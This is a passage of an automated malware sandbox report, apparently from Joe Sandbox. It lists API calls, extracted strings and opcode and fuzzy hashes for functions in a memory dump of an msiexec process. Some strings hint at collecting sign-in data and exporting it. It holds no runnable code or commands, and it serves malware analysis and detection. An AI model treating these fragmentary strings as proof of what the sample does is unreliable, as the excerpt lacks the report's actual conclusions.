                                                                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                          • String ID: .save$http://$https://$log profile$signIn
                                                                                                          • API String ID: 1214746602-2708368587
                                                                                                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                          APIs
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                          • memset.MSVCRT ref: 00405E33
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                          • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                          • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2313361498-0
                                                                                                          • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                          • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                          APIs
                                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                                          • String ID:
                                                                                                          • API String ID: 2047574939-0
                                                                                                          • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                          • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                          APIs
                                                                                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                          • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                          • String ID:
                                                                                                          • API String ID: 4218492932-0
                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                          APIs
                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memset
                                                                                                          • String ID: gj
                                                                                                          • API String ID: 438689982-4203073231
                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                          • API String ID: 3510742995-2446657581
                                                                                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4281309102-0
                                                                                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _snwprintfwcscat
                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                          • API String ID: 384018552-4153097237
                                                                                                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                          • String ID: 0$6
                                                                                                          • API String ID: 2029023288-3849865405
                                                                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                          APIs
                                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                          • memset.MSVCRT ref: 00405455
                                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                                          • memset.MSVCRT ref: 00405483
                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                                          • String ID: 6$\
                                                                                                          • API String ID: 404372293-1284684873
                                                                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesErrorFileLastSleep$free
                                                                                                          • String ID:
                                                                                                          • API String ID: 1470729244-0
                                                                                                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                          APIs
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 1331804452-0
                                                                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                          • String ID: advapi32.dll
                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                          • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                          • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_snwprintf
                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                          • String ID: %2.2X
                                                                                                          • API String ID: 2521778956-791839006
                                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                          • API String ID: 999028693-502967061
                                                                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                          APIs
                                                                                                          • strlen.MSVCRT ref: 00408DFA
                                                                                                            • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                          • memset.MSVCRT ref: 00408E46
                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                          • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memsetstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2350177629-0
                                                                                                          • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                          • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                          • API String ID: 2221118986-1606337402
                                                                                                          • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                          • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                          • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                          • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                          APIs
                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                          • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                          • memset.MSVCRT ref: 00408FD4
                                                                                                          • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                          • memset.MSVCRT ref: 00409042
                                                                                                          • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                            • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 265355444-0
                                                                                                          • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                          • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                          • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                          • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                          • API String ID: 2618321458-3614832568
                                                                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
